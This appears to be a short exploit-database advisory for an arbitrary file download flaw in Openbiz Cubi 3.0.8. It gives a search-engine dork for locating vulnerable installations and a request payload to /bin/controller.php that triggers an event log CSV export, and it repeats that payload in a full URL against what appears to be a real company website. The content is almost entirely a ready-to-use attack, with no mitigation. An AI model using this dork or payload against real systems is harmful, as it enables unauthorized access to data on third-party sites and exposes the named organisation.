====================================================================================================================================
| # Title : Openbiz Cubi 3.0.8 Arbitrary File Download Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://code.google.com/archive/p/openbiz-cubi/wikis/CubiCoreConcepts.wiki |
| # Dork : " System Login - Cubi Platform " |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /bin/controller.php?F=Invoke&P0=[myaccount.form.EventLogListForm]&P1=[ExportCSV]&__this=btn_excel:onclick&_thisView=myaccount.view.MyEventLogView&qry_ipaddr=&myaccount_form_EventLogListForm_page_selector=1&myaccount_form_EventLogListForm_page_selector=1&myaccount_form_EventLogListForm_pagesize_selector=10&myaccount_form_EventLogListForm_pagesize_selector=10&_selectedId=
[+] http://www.elbaklawy-group.com/booth/bin/controller.php?F=Invoke&P0=[myaccount.form.EventLogListForm]&P1=[ExportCSV]&__this=btn_excel:onclick&_thisView=myaccount.view.MyEventLogView&qry_ipaddr=&myaccount_form_EventLogListForm_page_selector=1&myaccount_form_EventLogListForm_page_selector=1&myaccount_form_EventLogListForm_pagesize_selector=10&myaccount_form_EventLogListForm_pagesize_selector=10&_selectedId=
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================